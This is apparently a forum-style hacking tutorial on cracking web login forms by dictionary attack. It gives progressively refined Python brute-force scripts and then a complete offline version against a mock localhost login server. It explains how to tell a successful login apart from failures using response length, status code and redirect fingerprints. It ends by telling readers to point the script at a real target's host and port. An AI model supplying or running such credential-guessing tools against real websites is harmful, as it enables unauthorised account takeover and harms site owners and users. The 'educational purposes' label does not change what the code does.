How to crack an online login

for educational purposes only 

It is crucial for your path into the world of software, networks and hacking to understand
how those tools actually work behind the nice, comfortable GUI they often offer us.

Login forms
offer us a way to enter a private section of a website.
You access them using the login credentials you chose when you first signed up.
If you don't have any login data you can't log in.
Here's what a typical login form looks like:

Code:

<form action="login.php" method="POST">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" name="submit" value="login">
</form>

The data is processed by login.php, which checks whether the username-password combination you entered is right or wrong.

Bypassing login forms
is what hackers do in order to gain access to a private section of a website, by either

  1. exploiting database vulnerabilities to find credentials or to bypass the check altogether (SQL injection)
  2. session hijacking (cookie theft)
  3. social engineering, or simply watching someone type their password (shoulder surfing)
  4. guessing: trying every password a user could plausibly have chosen (brute force / dictionary attack)

There are a couple of other techniques apart from those mentioned above, but we're going to focus on brute-forcing login credentials,
since it offers a great opportunity to learn about networks and protocols as you dig deeper into it.

Password crackers
mostly use dictionary attacks to guess a user's or admin's password:
they run through a list of words until they find one that matches the actual password.
I'm using Python because it's easy to read and understand, however I'm not a Python god.
I'm using the requests library to fire off POST requests to the web server that hosts the login page.

Code:

import requests

payload = {'username': 'admin', 'password': '12345'}
r = requests.post("http://example.org/login.php", data=payload)
print(r.headers)

I'm importing requests, which you have to install first (pip install requests), then
issue a POST request to the server with the login credentials declared in the payload;
r.headers returns the server's response headers.
Note that 'username' and 'password' are the name attributes of the input tags in the login form above, which is why the payload keys must match them exactly.

Now we want to try every combination of usernames and passwords from two wordlists, so the code needs to be rewritten to
Code:

import requests

with open("usrlist.txt") as username_list:          # file with usernames, one per line
    for x in username_list:                           # loop through them
        x = x.strip()                                 # cut off the trailing \n
        with open("pwlist.txt") as password_list:     # file with passwords, reopened for every username
            for y in password_list:                   # loop through them
                y = y.strip()
                payload = {'username': x, 'password': y}   # set payload
                print("Trying", payload)
                r = requests.post("http://example.org/login.php", data=payload)

 

Now we need a way to tell that the right username-password combination has been found, which sometimes turns out to be surprisingly difficult.
One way is to fingerprint the Content-Length header of the response: first send a POST that is certain to fail (a random password nobody would use),
record the Content-Length it comes back with, and then compare that value with the Content-Length of every later attempt.
A different length means the server sent a different page, which is a candidate hit.
Two caveats. If the server doesn't send a Content-Length header at all (chunked transfer encoding, for example) this comparison is not available,
so check the server response in Wireshark or in r.headers first, and fall back to comparing len(r.content) or searching the body for the error message.
And a successful login usually answers with a 302 redirect to the private area; requests follows redirects by default, so you would end up
comparing the landing page instead of the login response. Pass allow_redirects=False to requests.post and compare the status code and Location header as well.
Also expect real targets to rate-limit or lock accounts after a few failures, which both slows the attack down and changes the response for reasons that have nothing to do with a correct password.


Here's what a very simple password cracker script in Python might look like

Code:

import requests
import secrets
import sys

URL = "http://example.org/login.php"

# Take the failure fingerprint first: a random 32-character password will never be right,
# so this response is what a failed login looks like. allow_redirects=False keeps a 302
# on success from being replaced by the landing page it points to.
bad = requests.post(URL, data={'username': 'admin', 'password': secrets.token_hex(16)},
                    allow_redirects=False)
failure_length = int(bad.headers['Content-Length'])   # requests header names are case-insensitive

with open("usrlist.txt") as username_list:
    for x in username_list:
        x = x.strip()
        with open("pwlist.txt") as password_list:
            for y in password_list:
                y = y.strip()
                payload = {'username': x, 'password': y}
                print("[!] Trying", payload)
                r = requests.post(URL, data=payload, allow_redirects=False)
                if int(r.headers['Content-Length']) != failure_length:
                    print("Password found!", payload)
                    sys.exit(0)
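The script above takes one global failure fingerprint, which breaks as soon as a login handler distinguishes "unknown user" from "wrong password": every real username then differs from the baseline and is reported as a hit. The following is an added, self-contained example (not code from the original post) that runs entirely offline. It starts a constructed mock of login.php on localhost that answers with a 302 to /admin/ for the single valid pair admin / hunter2 and with 200 error pages otherwise, takes the failure fingerprint separately for each username using a random password, compares status code, Location header and body length rather than Content-Length alone, and uses the standard library's http.client (which never follows redirects) so nothing has to be installed. The mock server, its users, the wordlists and the path are all assumptions made for the demo.

```python
import http.client
import secrets
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for login.php: the only valid pair is admin / hunter2 (assumption for the demo).
VALID_USERS = {"admin": "hunter2"}


class MockLogin(BaseHTTPRequestHandler):
    """Behaves like many real login handlers: 302 to the private area on success,
    200 with an error page otherwise. It also leaks whether the user exists,
    which is exactly the case that breaks a single global baseline."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if user not in VALID_USERS:
            self._page(b"<html>Unknown user</html>")
        elif VALID_USERS[user] != password:
            self._page(b"<html>Wrong password for this user</html>")
        else:
            self.send_response(302)
            self.send_header("Location", "/admin/")
            self.send_header("Content-Length", "0")
            self.end_headers()

    def _page(self, body):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo output quiet


def start_server():
    """Start the mock on a free localhost port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def attempt(host, port, path, username, password):
    """POST one credential pair and return a fingerprint (status, Location, body length).
    http.client never follows redirects, so a 302 on success is seen as a 302
    rather than as the landing page it points to."""
    body = urllib.parse.urlencode({"username": username, "password": password})
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", path, body=body,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return (resp.status, resp.getheader("Location"), len(data))


def dictionary_attack(host, port, path, usernames, passwords):
    """Try every username/password pair; return (user, password, fingerprint) for the
    first attempt whose response differs from that username's own failure baseline,
    or None if nothing in the wordlist works."""
    for user in usernames:
        # Baseline per username: a random 32-hex-char password is in no wordlist,
        # so this response is what "wrong password for this user" looks like.
        baseline = attempt(host, port, path, user, secrets.token_hex(16))
        for password in passwords:
            fp = attempt(host, port, path, user, password)
            if fp != baseline:
                return user, password, fp
    return None


if __name__ == "__main__":
    server, port = start_server()
    try:
        print(dictionary_attack("127.0.0.1", port, "/login.php",
                                ["root", "admin"], ["12345", "password", "hunter2"]))
    finally:
        server.shutdown()
```

Against a real target you would replace start_server() with the host and port of the site and keep everything else; the per-username baseline costs one extra request per user and removes the false positives that a global baseline produces on servers that leak whether an account exists.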
